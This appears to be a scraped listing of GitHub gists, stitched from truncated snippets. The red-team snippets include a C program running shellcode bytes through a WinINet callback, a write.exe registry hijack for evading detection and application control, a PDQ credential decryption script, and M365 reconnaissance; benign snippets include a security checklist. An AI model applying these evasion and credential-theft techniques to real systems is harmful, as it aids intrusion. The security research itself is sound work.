// list of mov rax, gs:[60h] candidates in all modules on Windows
//
// mentioned in this tweet : https://x.com/dudeperfectdog/status/1963625066215727320
//
// use +0x0 as your search to find candidates with it at the beginning of the function
//
// code will come later!
[[IN]] C:\Windows\System32\aadauthhelper.dll
==> SafeAllocaFreeToHeap+0x0 (RVA: 0x45590)
@daaximus
daaximus / symcache.ps1
Created September 1, 2025 14:06
symcache - recurse and dump all windbg symbols for a given directory
# probably exists in a better form; but script is useful for caching OS modules based on major OS version/build and file
# hash. intended to make life easier, ymmv.
#
# .\symcache.ps1 -src "C:\Windows\System32\drivers" -dst "X:\Windows\drivers"
# ^^ This will copy and organize the bins in the subdirectory and recurse through all subdirectories, and then download
# the symbols if they are available.
#
# - daax
param(
import argparse
import datetime
import logging
import os
import random
import struct
import sys
from binascii import hexlify, unhexlify
from six import ensure_binary
@whokilleddb
whokilleddb / JasonToddIsTheBestRobin.c
Created August 21, 2025 22:51
Unnecessarily complicated way of controlling shellcode execution using InternetStatusCallback()
#include <windows.h>
#include <wininet.h>
#include <stdio.h>
#pragma comment(lib, "wininet.lib")
// notepad.exe shellcode
char shellcode[] = {
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,
@whokilleddb
whokilleddb / LowNtReadFile.c
Created August 12, 2025 21:19
Read contents of a file using LowNtReadFile
#include <windows.h>
#include <winternl.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "ntdll.lib")
#define FILE_TO_READ L"\\??\\C:\\Users\\DB\\Desktop\\test.txt"
EXTERN_C NTSTATUS NtOpenFile(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, ULONG ShareAccess, ULONG OpenOptions);
#!/usr/bin/env python3
"""
M365 OSINT Reconnaissance Tool
Based on techniques from: https://dstreefkerk.github.io/2025-07-m365-email-osint-after-lockdown/
This script performs modern M365/Azure AD reconnaissance after Microsoft's lockdown of traditional
enumeration methods. It uses multiple validation techniques to discover organizational information
and attempts to infer MOERA domains.
"""
@mblzk
mblzk / README.md
Last active July 15, 2025 02:48
Proxying binary execution through write.exe

Write.exe is a wrapper binary for launching wordpad. Historically it was used to launch Microsoft Write, a very basic word processor from the pre-2000 era. It has been left as a compatibility stub from Windows 95 onwards.

This binary checks the HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\wordpad.exe registry key for the location of wordpad's executable, and that key can be created by a regular user. This might be utilized to confuse detection/application control solutions that rely on parent-child relationships. The resulting process will be spawned as a child of the Windows-signed (Signing Level 12) write.exe.

If one controls a domain, it is possible to utilize UNC paths to run remote binaries without dropping them to disk. This requires additional steps to bypass the security prompt.

tl;dr

I want to just run an exe

@odzhan
odzhan / crt.c
Last active January 17, 2026 21:16
Writing Tiny Executables in C
/**
Compile with your C console project.
*/
#include <stdio.h>
#include <windows.h>
#define __UNKNOWN_APP 0
#define __CONSOLE_APP 1
#define __GUI_APP 2
@garrettfoster13
garrettfoster13 / decrypt.py
Created April 11, 2025 19:13
decrypting PDQ creds
import hashlib
import struct
import argparse
from Crypto.Cipher import AES #pip install pycryptodome
def decrypt(blob, key):
"""Decrypt PDQ credential blobs"""
#Format for the blob is [header][ivlen][iv][encdata]
#Example blob: 28656e63727970746564290010644d18eb7817dad6de5f531b1b0b60113087662f3cf0ffdaa7760418c15ee6ea
#Example blob: [28656e637279707465642900][10][644d18eb7817dad6de5f531b1b0b6011][3087662f3cf0ffdaa7760418c15ee6ea]
@mattppal
mattppal / security-checklist.md
Last active February 25, 2026 18:16
A simple security checklist for your vibe coded apps

Frontend Security

| Security Measure | Description |
| --- | --- |
| Use HTTPS everywhere | Prevents basic eavesdropping and man-in-the-middle attacks |
| Input validation and sanitization | Prevents XSS attacks by validating all user inputs |
| Don't store sensitive data in the browser | No secrets in localStorage or client-side code |
| CSRF protection | Implement anti-CSRF tokens for forms and state-changing requests |
| Never expose API keys in frontend | API credentials should always remain server-side |